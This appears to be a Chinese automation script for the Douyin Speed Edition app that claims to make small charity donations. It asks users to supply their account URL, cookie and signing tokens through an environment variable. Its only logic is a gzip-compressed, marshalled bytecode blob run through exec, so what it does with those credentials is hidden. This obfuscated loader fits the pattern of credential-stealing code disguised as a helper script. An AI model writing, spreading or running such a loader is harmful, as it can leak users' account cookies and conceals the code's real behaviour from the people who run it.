import json,requests,time,os
import sys
from notify import send
'''''
抖音极速版捐款，默认捐0.1，预防黑号，为公益事业做贡献
变量名：dyjsb，多号换行，格式url#cookie#argus#ladon
url只需要？后面的
ua（User-agent）填自己的
'''''


ua = ""


# Make Sure You're Running The Program With python3.10 Otherwise It May Crash

try:
	import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(gzip.decompress(b'\x1f\x8b\x08\x00\xb8\x00\x94d\x02\xff\x9d\x16[s\x13\xe7u/\xbaY\x96\xc1\x18\x1bc.\xc6\x08\xe2D\xd4\xb2d\x19;\xc6S\x970\x90\x92\xb6\x0c\xa5\x01\xa6\x9e\xeddv\xd6\xfb}\x96\xd6\x96V\xf2\xee\xb7\xc6V\xec\x19\'6I \x18\x0cI\xda!\x90\xd8\xa2\xa5$L\x86K\xcb\x04\x17p\xf3\xda\xdf\xb0om\xac\xdbS\x1f\xfa\xd0\x19?\xf5\x9c\x95\xed\x82C_\xaa\xd5\x9e\xef|g\xcfw\xce\xd9s]\x95\xdb\xf0\xab\x86\xfb\r\xb8\xcdk<\xc7\x11N\xe2(\xbf \x10>\xc7K"\x15\x17\\D\x00\xccM8\xc5s\x9c#"q\xcdp\xc45-H^\xea\xa5\xbe\xa1\xaai\x9e\xfa\xe4*\xea_\xa8&n\xe2\xc9\tR\x80\x06\x86j\x88wX0\xda\xe8&\xc07O\xf3<\xa7\xbb\xe8&\xe2C\x0c\xd6*g\xad\xa5[h\xddB]\x8e#\xfezn\x9a\x9f\xe6\xa5\xad\xb4\x9e6P7\xe2\xc7\xb8w&\xa5m\xd4M\xb75q`A5X\xd0H\x1bI\xa0\x89\x93\xb6\xc3Z\x03k\x13\xac\x9b`\xdd\x01\xebfXw\x92Z\xb2e\x86\x93v\xd1]\xd3\x9c\xa3\xa7\xce\xd1S\xb7\xb0\x9bl\xca\x01F\xb6\xd2\xa6\x1b\xdc\x17\x82\xd4D\xea\xa5f\xd2@\xb6\x91F\xba\x9drt+\xd9Nw\xd0\x9d\xa4\xe9f\x95\xb4\x87\xfa\x87\xaa\xc9\x0e\xdaD\xf7\xd0f\xb2s\xd6%\xb5\xd0\x96\xd5\xf7yD[\x16\xf6\xe6\xb8\x85 \xd9\x95\xe3I\rP\xee\xafSv\x83\x85\xcd\xa0\xb3\x996\xc3nO\x8e\x07\xd8\x02\\{\xeb\xb9\x1b\x1c\t~!:^\xa8\x02\x8e}\xeb\xfe\xd8\xbf\xea\x8fW\xd6\xedlE;G\x8e\xd1}\xe4U\xe6\x99\x16\xc0\xe6\xd7Ns\xa1\x90\xcd\x81\xff\xc7\x87\xcc\x01\x9b\xf7\xab\x1b\xa3\'\xacEo?\x00\xcaI<D\x10\xa2G\x04\xf0\x85X\x89\x97\xe4\xc2\xd8\xcc\xa0\x14/\xc8\xf3\xd9\x81\x13\xe9x\x9c\x1a\xbf64F\rU\xd8 \r\xef\xa3(\xd1\x0f`\x82\x9f\xe0d\xc8\x8a\xd3\xdc\xd7\xfc\xc9\x10o\xbb\x93t\x94&C\x82\xed2ir\xd0p\x01\xcb\xd7\x9c\xe1\x81e\xc5\x7fj<\xfcS\xcbT\x15Fm\x9f,k\xba\xc6d\x19e\x98(\xd1\xcfg\x1b\x9eW\xdb\xbe\xc6\xf1\x03\xfd\xe2\x9a\xfe\xed\xa8\x9f\x1b\xe2\x16\xf8\t\x1e=\xc3\x84\t\xfeuN\x11\xd0\x1a\x03\xb9B\xa2c\x80\xed>\x87"\xed\xead:.\xabi\x9dQ\x9d\x85\x04\xc3\x8d\x8f\xbc)j\x9a\nhE\x13+\xc0\x8b\xa0\n@\r*A\x01\x01!\xc0g\xeb^\xb0\xce\x91\xa8\xf2\xcf\x99\xc6\xaf\xdeG\xd7N\xad\x9b\xe1\x88\r\xf1\x8e\xc2\rzl\xf7`\xd22\x13uk^pm\xd4\xe3<>\x19\xf2\xa0\xc7t%Ee\xd9\xf6\xcbr*M\xac$\xe2\x01Y\x1e\xb1\x94d\xe5\x89\xe1[\xb3\xdc\x08\xbc\xa8\xea\xbf\xef\x85J\x90\xc3D^\x1f\xe7\xe3}b\xc0\xedPm\xf1\xf8\x9bg\xb2?O0\x96\xe9\x8dD\xe2\x89\xf6\x11]\xd3G\xdaU=\x82$\x13h\x86r\xae=\xae\xb1\x845`\x99\x90\x17\x15G\xb6\xab\xe9T$v\xb0\xe3\xf5C\x9d\x91\x01KU\xb4X$\xa5hz$\x1e/\xff\r\xa4Z{\x01,/\xce\x16.\xcc\x16\xae\xcc\x95?\xb8Vx\xff\xab\xe2\xd2\xd5\xd2\xe3\xfb\xa5\xef\xbe,\\\xbe]\xfa\xf6|\xe1w\xdfZm\xc0\x95_\xfa$\x0f\\\x17\xee\x94r\x97\xbe\x9f\x9a+\\\xfcmy\xfe\xcf\x85/\xdf+O\xcd\x17/|T\x98\x9d+|\xf3\xd7\xef\xa7\xae\xb6\x8cv\xb4G\xb5\x128v\x85\xdfWF\x8f\x97\xd1\xfde|\x872\xba\xfb\x85\x12\xc0w\xdd\xb4\x16\x15\x1b\xa3\xc23\x0e\xcb|\x92#\x02\xa6?\xa6>\xf1\x12\x1f\xa9"~\xc63\x81\x89\x0c\x1a\xca\xcd\x9aI\x9e\xb9\x87<$0\x01)\xaeq\xa4f\xd65)0\xef\x82oB\x18\xaa\xca\xf1\x93\xe2\x84\xb8\xe0\xc7\xc61\xe9r\xb0\xcdP\xcc\xb5P\xf2\xd4\xd9m\x81]\x9d\xb3s\x11nX\xc4\x15\xa8[\x81\xdb=\xe1\x06\xac\x1e0\x8f\x835\x00\xe6u\xb0m\x80\xf9X5id\x01\xb2\xbd\x11\xdbB\xd3\x84\x17\xe0\x8e\t\x0f\xd9\xe9\xb4\x89]\x13>\xb0\xdci\x93\x98[\xc0\xbb\x1b\xadq\x1a\x01\xecC\xcd\'\xb3\x9f\xac\xc5J\xc9h\x9da=m\xa4\x94dXm\x87\xf4H\x8d:\x91JZ\xea\xf08\x94`D9GS42\xda\x119\xa7$\x93\x94E2Fz\x10\xca\x8dP\xa6hI9\x03%qX\xd3\xe1\x04\x95\xd9x\x86\xf6u\xb4\xa6\x07\x07M\xca\xfa\xa2\xad\xba\x95\xea\x8bE[\xcd\x84bP\x87\xb1\xafr\xd6|\xfep\xeb0\x1d\xefS\x153\xd1zx\xa5\xf1\x7f\x18\x93\xf5u\xb6w\xb7G!\xc5l>f{b\xd1\xce\x8eh4\xebV\xf5pB\xb7EK#\xd9\xe8\xcfND\xfa\x7f1x&\x0bI\xfe\xe6\x91\xc4\xa1\xfeHg\xb7\xd4\xffv\x0f\x89G\x06\x86\xbb\x92\x03\xfdG\xdf\x1ef\xa9_%H\xd7[\x07\x8f\x9c\x8d\x8e\x1c\xcb\x8a\x07"\x07V\xfc\xc3\x94f\xc2JR\x1b\xa5\xa1\x1a\xdb\xf5V\xdad\xd9\xa6\xb1\xf0\xa8\x1a\x1e \xcc24=\x1e6\xc9px\x94\x1a\xa6\x96\xd6\xb3\xd5\xcfmV\xea3\x8aif\xd2\x06{\x81e\xcbX\x98\x01\x85\xa5\r\x1a6h\x1cI\r? \x85MC\xcd\xfa\xc6\xc2\t\x9a\xd4\xd2\xa6\xed9\xa2\xaa4\xc3l\xff\xd1\xb4\xaeS\x95\xe1!\xffY\xa8\x9c0\xf8Gg+\xde\xfe\xf0\x11#n\x99\x88\x9cPHZ\xb7=G\xd3\xe9a\x8d\x1a\xb5\xd85\x05\xdb\x9b\xa0\n\x01\x03l\x17Q\x98b\xbc\x82E\xea\xa1\x86!\x83+\xeba#\xf9p\xc3\xb4\x8cia\x81\x17>\x9a\xcb_\x9c\x97\xaaW\xc3\x86g\xa4\x00\x86@\x1eP\x92\x8a\xaeR\xa9\xc6T\xc1\xda\xf5m\x1d\x1dS\x13\x8a\x1e\xaf\x84\xd8i/\x166\x89\xdf\x94\x1e\xfd1\x7f\xe5\xb1\xb1\x15\xebw\x0b\x80wVKs\xeai\xf9\xc3\xab\xf9\xc5\xf7z-,\xa9\x96\n\xb5x\xf9\x01P{\x8b\xef\xd6\xdf;\xfe\xf7\xec\xcca\xe7D\xfe\xfctK\xfe\xfc\xd5\xc2\xec\xad\xc2W\xb9\xfc\xb3+\xbdN\x1f(^\x7f\x9a_\xfa,\xff\x87\x87\xa5G\xb7\xff\xf9\xecR\xe9\xc3\xbb\xf9\xc7\x0f\x0b\xbf\x9f*\xcc\xdf.|\xf6\xa00{\x0f\xa2%ZF\xd2\x16,\xc5v+\xe8\x1c\x18(\x15\xd7\xa8\x8ekl\x9fAG,j2\xd3\xf6\xaeb\xb6k\xc8\x04\x06w2\xad\x10p\x15\xa3c\xcc\x16\xe3\x94\xd9\xee\x0cD\x9a\xd9\xbc\x16\xaa\xb2] \xb5\xc3\xd8\xef\xb49\x83\x9a\x9206&\x89cc1\x04\x9d\xb0\x1b\x92\x84\xa1\x01[H\x99\x1b\xfb\xb30\x9e@\xbf\x9b1gD\t\x82\xc0\xbf\xfc\xf2\xfc\xabns\x80\xf7\xf3\xfb\xe1\xae\\m|\xad`\xf4\xac\xb5\xc0\x7fL\xdd\xaa\xfc\xf3\xcf\xa6\xf2w>\xaet\xb3h{\xc7:=\xfb\xc6\xff]\xba\xe0\x1f\x98\xa9\x87\xb3\xda\xbbA%\x95\xb6t\x16\xec\xed\x88\xb6\xad\xe2Nl\x81\xd0\x16\x84*\x1d\x824\x945\x12\xec\rv\x1f\xea\xe9\x89\xf6\xc4b\xd1X\xb4\xab\xab\xeb\xe0\xc1\xae\x9e\xce`[0\x05m\x1d2\x82\xc9P\xbd\xc0\xd4\x11\x8b\xc2\xaf\xeb\xf5\xceN\xb9g\x15\xe9>\x14\xeb\x0cN\x1a\x8d\xe8\xa0\x9d\x00\xb2\xb5J&\x93\xd4\xc0,H\xef\x08F\xc2h\xc2iWe\xecB\x96=\x08\x9a\x11\x04\x91\xb9\x92\xfeG0\xfd\xb3\x9b\xa1zVC\x18f\x1ah\xde\x8dl-\x08\xd0a\xb6\xeb\xd4/O\x9f1\xf6\xe1\xbe\x15\x01\x86\xc1:\x8by\xee\xf8\xae\x92\xedm\x85\x99\xf9\xd2\x83[\xcbK\x0b\xcb\x8bO\xf2\xe7\xbf)\xde\xb8\xb8\xfc\xe4\xe3\xe5\xc5\xcf\x8b\x9f\xcf\x94\x1e\xe5\x8a\x97\xeeA\x9e\x15\x9f^\x07\x86\xca<\x81\xbc\xce?\x9b)^_Z^\x9c*\xbe\xff\x17\x9c3SOA\xa2\xd4\x803MF\x1f\xc9\x15\x7f\xca&S\x98T\x83\x16\x9f\x02\xea\x994S\x92\xc6\xabhDU%\xc1A2\x8c#\x0bgw\xfe\xca\xfd\xd2\xf4\x12*\xf9S\xae|\xed\xe1\xf2\x93\x0f,tN\xe1\xe6\xdd\xe2\xfc\xed\xf2\xa7\xd7K\xf7\xef\x03\xf7\xf3\x99n\xe1;\xf59\xbf\xee\xe2\x9dk\xf9\xb9\xcb\xa5\xef\xe6`\xf0-/\x82\xf5S\xcb\x8bw\xc1\xd0\xcac\x7f\x19\xb3\xd1j@y/\x1b\x89\'C\xfb\x8d\x90\x93\xaa\xd8s \xf1\xa9>*y+\xe5\x12\xb5\xdd&D\x87I.ux0n\xf8\xd7\xbe\x00l\xd1\x1c\x07f\x93\x91\xb4\xc5\x8c0\x92\xdb\xb1\xa1\x08\xf1\xb8]\x8d\xefm\x99\xf0\xa1\x04\xbd\xa7\x13\x1fuTN0\xc3v\x1b\x90R\x04\x8a\x0c\xe2e\x8bz\xfa\x1cP\xb0\x81\xd8b\x92\xea\xc6A\x14\xe1FM\x1d\x06\x0et\xe35\x04\x07\x10\xfc\x08A\x8f\xf3\xc1c&\xa19;\xd1t\xea\xd1\xe8F\x10A\x10s\xc2nR\x9d\xbc\xec\xd3\xc5\xf6\xfd\xb8\xf2\xd9\xf3\x13\x9c\xf9f?~-\t~\xd1\xcf\xbb\xf8M|\xa0: \xf8\xf9\x00\xef\x13||=_\x0b\x14\xdf\xda%zv\xfb\xb0 \x05\xd7K\xca\xd7\xf3\xef\xbaj?_\x07\xfcA\xe0\xc0\xd3\x01\xc0\xff\x03*\xc7\xb8\x15\x03\r\x00\x00')))
except KeyboardInterrupt:
	exit()
